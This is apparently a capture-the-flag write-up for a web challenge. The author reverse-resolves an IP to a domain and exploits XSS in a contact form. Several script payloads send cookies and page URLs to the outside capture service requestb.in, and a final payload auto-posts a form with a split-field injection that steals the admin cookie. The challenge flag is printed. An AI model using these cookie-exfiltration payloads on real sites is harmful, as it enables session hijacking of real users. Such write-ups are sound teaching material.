Tags: blackbox xss pentesting
Rating: 5.0
# BlackBox Pentesting
```
Our agents found a BSC server which is used to contact one of the Corp's sysadmins. We managed to get his
IP (45.77.146.27), but we still haven't found it's domain. After obtaining the domain, we believe it's
possible to exploit their website somehow, and then obtain sensitive data. Use your old school pentesting
skills and you will be rewarded!
dir(search|buster|*) tools NOT needed and NOT allowed!
Id: blackbox_pentesting
Total solves: 4
Score: 420
Categories: Web, Recon
```
For this challenge, the only thing that we have is an IP. The description suggests that we should reverse-dns this ip to get the corresponding domain.
I used [dnstrails.com](http://dnstrails.com/) and it showed me that the domain was `bloodsuckers.world`.
The website was made of a contact form asking for a name and a message. And that was all, nothing else. I tried both SQLi and XSS injection, and it turned out that the message is XSS-injectable, so i tried to steal the admin's cookies:
```html
<script>
new Image().src="http://requestb.in/XXXX?cookie=" + document.cookie;
</script>
```
(I used [requestb.in](http://requestb.in) the whole challenge)
And the cookies where: `Nice_try!=But_you_need_to_dig_deeper`
Nice, i'm getting troll :')
So let's dig deeper and print more information. I tried both local and session storage, and both were empty. I tried to print the HTML of the page, and found nothing interesting.
Then i tried to print the URL of the page:
```html
<script>
new Image().src="http://requestb.in/XXXXX?path=" + encodeURI(document.location);
</script>
```
Turned out to be `http://sandbox.bloodsuckers.world/render` !
Oh, it's not the same domain, so the cookies that i'm reading are the ones of `sandbox.bloodsuckers.world` and not the ones of `bloodsuckers.world` (cookies aren't shared (by default) between subdomains).
So here came the point where i struggled the most, and i suddenly realised that not only the message is XSS-injectable, but the username too ! And guess what, when you submit the form, it says "Dear XXX, thank you and we will answer you shortly" (or something like that).
So here was the plan:
1) First, submit a message that is going to be read in `sandbox.bloodsuckers.world`
2) Use this message to submit the form of `bloodsuckers.world` for the user, using a name that contains an XSS injection to steal the cookie
3) At the page 'Dear XXX', the code is executed and the cookie are stolen!
Easy, or no. The name is limited to 12 characters only (client-side and server-side checked).
But if you send it twice, the backend application is gonna concat them into one, and only the first one is limited to 12 characters.
With all that, i was ready to craft the ultimate payload:
```html
<script>
var form = document.createElement("form");
form.setAttribute("method", "POST");
form.setAttribute("action", "http://bloodsuckers.world/admin/contact");
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "name");
hiddenField.setAttribute("value", "lol");
var hiddenField3 = document.createElement("input");
hiddenField3.setAttribute("type", "hidden");
hiddenField3.setAttribute("name", "name");
hiddenField3.setAttribute("value", '\'; new Image().src="https://requestb.in/XXXXX?cookie=" + document.cookie; //');
var hiddenField2 = document.createElement("input");
hiddenField2.setAttribute("type", "hidden");
hiddenField2.setAttribute("name", "message");
hiddenField2.setAttribute("value", "lol2");
form.appendChild(hiddenField);
form.appendChild(hiddenField2);
form.appendChild(hiddenField3);
document.body.appendChild(form);
form.submit();
</script>
```
And the flag was `CTF-BR{D0_y0u_eV3n_5oP?}`
Thank you for reading,
The `Rapace Diabolique`
